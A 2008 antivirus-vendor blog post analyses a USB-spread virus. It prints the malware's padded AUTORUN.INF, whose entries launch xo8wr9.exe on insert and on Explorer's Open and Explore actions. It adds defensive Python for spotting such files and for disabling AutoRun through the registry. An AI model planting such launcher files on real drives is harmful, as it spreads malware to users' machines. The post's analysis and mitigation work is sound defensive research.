CA Security Advisor Research Blog


USB drives infected? A quick analysis

by Rossano Ferraris


Interestingly, 2008 opened with surprising news in the malware field. Infected hardware? Yes, once again malware authors have shown their inventiveness in spreading panic and damage across the computing world.


According to recent reports by the SANS Internet Storm Center there is a new trend of transmitting malware through hardware vehicles such as USB ports.

As you know, a USB port is a very powerful channel for transferring data between your PC and an external device: think of memory sticks, SD cards from digital cameras, GPS devices and external hard drives.

Every such device that presents itself as USB mass storage is mounted by Windows as a drive, and every drive Windows mounts is a place where malware can plant an AUTORUN.INF file and a copy of itself. (Devices of other USB classes, such as keyboards and webcams, are not mounted as drives, so this particular trick does not apply to them.)


To explain what happens from the technical point of view, I would like to show you some details of a malware sample I received from one of our customers, who stated that his machine had been compromised after he plugged in a USB flash card.


The malicious architecture of the malware


The malware (a virus) copies itself to every drive, internal and external, and writes or alters the AUTORUN.INF file in the root of the drive, which in this incident looks like this:


[AutoRun]
;liZc7kkoes7kd22k3D4Z0140fsoid2l47LiHKsLpXafw2Djr3larS5ed04sK503kUDd0Af7kDkK0FwkJ8ooJkLe1rwfrLl
open=xo8wr9.exe
;4dirwkkswijrSKkASFkKd4o2a2KJ54LAo3a5oD92Sppcd34osCwrA0dqfiJZs9L1oLaKw1D33rwLO7f4k3dsjw28offsls0ww4Ka
shell\open\Command=xo8wr9.exe
;r8k4ewsw35irr9S1iidak5oLaqw4k2D3Kf1jjdn1sUKioJlAKLioami
shell\open\Default=1
;LAKiLkkw7j2jIrSsDfFqa3ADLnq2reskSLiloawii5Kl3qaDk5w9L1m2dsklwla24edOw5rlf3w3k4fJj8i
shell\explore\Command=xo8wr9.exe
;aeDAp645K5kL71J5r7aZsc3Iksoj25ak3kaAokiw7wac2dwk1pKes5rJs2disajkLll


The lines beginning with ";" are INI comments that Windows ignores; the random text in them only serves to vary the bytes of the file. The entries that matter are open=, which AutoPlay runs when the drive is inserted, and shell\open\Command and shell\explore\Command, which replace the drive's Open and Explore actions in Explorer. So the malware (xo8wr9.exe) is launched every time you open the drive.

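To make the above concrete, here is an added example, written for this page and not a CA tool, that parses an AUTORUN.INF like the one quoted above and reports which entries would get code executed and which file they point to. The launcher key names (open, shellexecute, shell\<verb>\command) are the documented autorun.inf keys; the function names and the comment-padding rule (flag the file when junk comment bytes outweigh the real entries) are this example's own assumptions. The sample input is the file quoted above, embedded verbatim.

```python
"""Parse an AUTORUN.INF and report how it would get code executed.

Illustrative code written for this page, not a CA tool. The padding
heuristic is an assumption of this example, not a Microsoft rule.
"""
import re
from dataclasses import dataclass, field
from typing import List, Set, Tuple

# The AUTORUN.INF quoted in the post, embedded here as sample input.
SAMPLE_AUTORUN_INF = r"""[AutoRun]
;liZc7kkoes7kd22k3D4Z0140fsoid2l47LiHKsLpXafw2Djr3larS5ed04sK503kUDd0Af7kDkK0FwkJ8ooJkLe1rwfrLl
open=xo8wr9.exe
;4dirwkkswijrSKkASFkKd4o2a2KJ54LAo3a5oD92Sppcd34osCwrA0dqfiJZs9L1oLaKw1D33rwLO7f4k3dsjw28offsls0ww4Ka
shell\open\Command=xo8wr9.exe
;r8k4ewsw35irr9S1iidak5oLaqw4k2D3Kf1jjdn1sUKioJlAKLioami
shell\open\Default=1
;LAKiLkkw7j2jIrSsDfFqa3ADLnq2reskSLiloawii5Kl3qaDk5w9L1m2dsklwla24edOw5rlf3w3k4fJj8i
shell\explore\Command=xo8wr9.exe
;aeDAp645K5kL71J5r7aZsc3Iksoj25ak3kaAokiw7wac2dwk1pKes5rJs2disajkLll
"""

# Keys under [autorun] that make Windows run something: "open" and
# "shellexecute" are acted on by AutoPlay when the drive appears;
# shell\<verb>\command entries are acted on by Explorer when the user
# picks that verb from the drive's menu (or double-clicks the drive).
LAUNCH_KEYS = {"open", "shellexecute"}
VERB_COMMAND_RE = re.compile(r"^shell\\([^\\]+)\\command$")


@dataclass
class AutorunFindings:
    launchers: List[Tuple[str, str]] = field(default_factory=list)  # (key, command)
    executables: Set[str] = field(default_factory=set)              # files to hash/scan
    other_keys: List[Tuple[str, str]] = field(default_factory=list)  # icon=, label=, ...
    comment_lines: int = 0
    comment_bytes: int = 0
    payload_bytes: int = 0
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_autorun_inf(text: str):
    """Split INI text into (section, key, value) entries and ';' comment bodies.
    Section and key names are lower-cased: Windows matches them case-insensitively."""
    entries, comments = [], []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(";"):
            comments.append(line[1:])
        elif line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line:
            key, _, value = line.partition("=")
            entries.append((section, key.strip().lower(), value.strip()))
    return entries, comments


def command_executable(command: str) -> str:
    """First token of a command line, with a surrounding quoted path handled."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def analyse_autorun_inf(text: str) -> AutorunFindings:
    entries, comments = parse_autorun_inf(text)
    f = AutorunFindings()
    f.comment_lines = len(comments)
    f.comment_bytes = sum(len(c) for c in comments)
    for section, key, value in entries:
        if section != "autorun":
            continue
        f.payload_bytes += len(key) + 1 + len(value)
        if key in LAUNCH_KEYS or VERB_COMMAND_RE.match(key):
            f.launchers.append((key, value))
            exe = command_executable(value)
            if exe:
                f.executables.add(exe.lower())
                f.reasons.append(f"{key}= executes {exe}")
        else:
            f.other_keys.append((key, value))
    # Junk ';' lines between the real keys vary the file's bytes without
    # changing its effect. Threshold chosen for this example: flag when the
    # comment bytes outweigh the real entries.
    if f.comment_lines and f.comment_bytes > f.payload_bytes:
        f.reasons.append(
            f"{f.comment_lines} comment lines ({f.comment_bytes} bytes) pad "
            f"{f.payload_bytes} bytes of real entries: likely signature evasion")
    return f


if __name__ == "__main__":
    findings = analyse_autorun_inf(SAMPLE_AUTORUN_INF)
    for reason in findings.reasons:
        print("-", reason)
    print("executables to hash and scan:", sorted(findings.executables))
```

Run against the sample, it reports three launcher entries, all pointing at xo8wr9.exe, plus the comment padding; a vendor autorun.inf that only sets icon= and label= produces no findings, which is the distinction an analyst wants before deciding whether to pull the referenced file off the stick for scanning.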

It not only copies itself to other drives: according to this incident analysis, it also drops further malware onto the PC and opens a hidden connection to a malicious remote server in China.


CA users and customers are protected from this malware through detection by our CA anti-malware solutions (CA Anti-Virus and CA Anti-Spyware), but to help prevent future incidents I would like to offer some recommendations:


  • Regularly update your anti-malware solutions to the latest signatures
  • Disable the Windows AutoPlay feature if your environment allows it:
    • Start menu > Run and type "gpedit.msc"
    • Select Computer Configuration > Administrative Templates > System
    • In the right-hand pane you will see an item called "Turn off Autoplay"
    • Double-click the item and set the radio button to Enabled
    • Change "Turn off Autoplay on" to All drives
  • With AutoPlay disabled, scan an external USB device before browsing it: the policy stops the open= entry from running when the device is inserted, but opening the drive from Explorer can still trigger the shell\open\Command entry
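The Group Policy steps above end up writing a single registry value, NoDriveTypeAutoRun under the Explorer policies key, which is also the route on editions that ship without gpedit.msc. The following is an added example, not from the post or from CA, that computes that value, emits an equivalent .reg file and, on Windows, can write the value directly. The key path, value name and per-drive-type bits (one bit per GetDriveType() result, set = AutoRun disabled) are the documented ones; the function names are this example's own.

```python
"""The registry value behind the "Turn off Autoplay" policy.

Illustrative code written for this page, not a CA tool.
"""
import platform
from typing import Iterable, List

POLICY_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"
VALUE_NAME = "NoDriveTypeAutoRun"

# Bit = 1 << GetDriveType() result. A SET bit DISABLES AutoRun for that type.
DRIVE_TYPE_BITS = {
    "unknown": 0x01,
    "no_root_dir": 0x02,
    "removable": 0x04,   # USB sticks and flash cards
    "fixed": 0x08,
    "remote": 0x10,
    "cdrom": 0x20,
    "ramdisk": 0x40,
    "reserved": 0x80,
}
ALL_DRIVES = 0xFF   # what the policy writes for "Turn off Autoplay on: All drives"


def nodrive_autorun_mask(disable_on: Iterable[str]) -> int:
    """Build the DWORD that disables AutoRun on the named drive types."""
    mask = 0
    for name in disable_on:
        mask |= DRIVE_TYPE_BITS[name]
    return mask


def autorun_disabled_for(mask: int, drive_type: str) -> bool:
    return bool(mask & DRIVE_TYPE_BITS[drive_type])


def disabled_drive_types(mask: int) -> List[str]:
    """Decode a value read from a machine into the drive types it covers."""
    return [name for name, bit in DRIVE_TYPE_BITS.items() if mask & bit]


def reg_file(mask: int) -> str:
    """Text of a .reg file that sets the same value the policy would
    (the Regedit route mentioned for editions without gpedit.msc)."""
    return (
        "Windows Registry Editor Version 5.00\n\n"
        f"[HKEY_LOCAL_MACHINE\\{POLICY_KEY}]\n"
        f'"{VALUE_NAME}"=dword:{mask:08x}\n'
    )


def apply_policy(mask: int = ALL_DRIVES) -> None:
    """Write the value directly. Windows only; needs administrative rights."""
    if platform.system() != "Windows":
        raise RuntimeError("registry access needs Windows")
    import winreg  # only importable on Windows
    with winreg.CreateKeyEx(winreg.HKEY_LOCAL_MACHINE, POLICY_KEY, 0,
                            winreg.KEY_SET_VALUE) as key:
        winreg.SetValueEx(key, VALUE_NAME, 0, winreg.REG_DWORD, mask)


if __name__ == "__main__":
    print(reg_file(ALL_DRIVES))
    print("0x24 disables AutoRun on:", disabled_drive_types(0x24))
```

Two caveats a practitioner should keep in mind. The value only stops AutoPlay from acting on autorun.inf when a drive appears; on the Windows versions current at the time of this post Explorer still read the file to build the drive's context menu, so the shell\open\Command hijack shown above could still fire on a double-click, which is why the last recommendation is to scan before browsing. And Explorer caches a drive's autorun handlers under the user's MountPoints2 key, so a stick that was already plugged in before the policy changed may keep its cached handlers until that cache is cleared.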


Comments

Lani Refiti said:

Very good tip to turn off autoplay. Simple, yet it can be very effective. Going further, I've seen some businesses disable the USB ports on their users' desktops, and even use Data Leak Prevention software to disable them and, using policy, pick and choose which users to enable them for.

February 4, 2008 7:32 PM

Rossano Ferraris said:

GPEDIT.MSC (Group Policy Editor) isn't available on XP Home Edition, partly because XP Home cannot join a domain by design. Although the tool is designed to be used in an Enterprise environment running Active Directory, all it really does is make registry entries. So, the best alternative is to edit the registry using Regedit. Be aware that editing the registry incorrectly can make your system unbootable or cause other issues, so proceed carefully before diving in!

February 10, 2008 7:56 AM

USB memory stick said:

"So every device plugged into your PC through a USB port is considered a hard drive, and every device considered a hard drive by your PC can be infected by a compromising malware"

Oh no, my webcamz and keyboardz are infected!!!1one!

May 28, 2008 4:37 AM


About Rossano Ferraris

Rossano Ferraris is located in Italy where he lives and works for the CA Anti-Spyware Research Team as a research engineer. He was one of the first employees of PestPatrol and has been working for CA since its acquisition.

 

At CA he has taken worldwide responsibility for supporting the CA Anti-Spyware product family as a senior specialist engineer, and he has trained the CA Threat Support Team on spyware issues. His main interests include spyware research, phishing, exploits and potentially unwanted software falling within CA Anti-Spyware's scope of detection.

 

Rossano is an active member of various well-known security forums and a member of the ISSA association. He is the author of many articles on security matters for Italian newspapers and magazines, and also of a book on the spyware phenomenon published in Italy. He holds a degree in Computer Science and is GREM certified.